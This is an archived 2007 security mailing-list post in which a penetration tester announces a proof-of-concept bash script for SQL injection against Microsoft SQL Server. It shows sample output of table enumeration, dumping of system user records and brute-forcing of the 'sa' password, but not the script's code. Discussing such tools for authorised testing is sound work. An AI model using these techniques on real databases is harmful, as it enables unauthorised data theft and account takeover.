From: Marco Ivaldi (raptor@mediaservice.net)
Date: Mon May 21 2007 - 07:45:41 EDT
On Sat, 19 May 2007, winsoc wrote:
> Can anyone recommend a quick and cheerful Open Source Tool which will
> test websites for SQL Injection, XSS, Remote File Include.
Speaking of SQL injection, just wanted to point out a bash script i put
together while pen-testing some web applications that use MS SQL Server as
back-end:
http://www.0xdeadbeef.info/code/mssql-hax0r
# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational mode are currently available:
# info (Information Gathetering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).
You shouldn't expect anything too fancy (it's still v0.1 after all;), but
it does its job:
root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
Accounting (id:390494850)
CanoneAnnuo (money)
CodiceFornitore (varchar)
dataInsert (datetime)
GroupId (char) *
GroupInsert (varchar)
idAccount (varchar)
idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.
root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.
aaa
bbb
ccc
password
Password of 'sa' user is 'password'!;)
Enjoy,
-- Marco Ivaldi, OPST Chief Security Officer Data Security Division @ Mediaservice.net Srl http://mediaservice.net/ ------------------------------------------------------------------------ This List Sponsored by: Cenzic Are you using SPI, Watchfire or WhiteHat? Consider getting clear vision with Cenzic See HOW Now with our 20/20 program! http://www.cenzic.com/c/2020 ------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:49 EDT